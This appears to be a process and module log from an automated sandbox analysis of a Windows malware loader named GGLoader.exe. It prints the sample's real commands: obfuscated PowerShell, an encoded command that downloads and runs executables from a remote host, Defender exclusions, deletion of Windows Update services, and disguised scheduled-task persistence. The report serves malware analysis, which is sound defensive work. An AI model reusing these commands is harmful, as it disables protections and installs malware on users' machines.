Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQAnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAb Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicCheck.exe "C:\Users\user\AppData\Local\Temp\LicCheck.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\LicSend.exe "C:\Users\user\AppData\Local\Temp\LicSend.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{096b6fe7-1e57-4538-901c-c68ea60d3345}
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\GGLoader.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
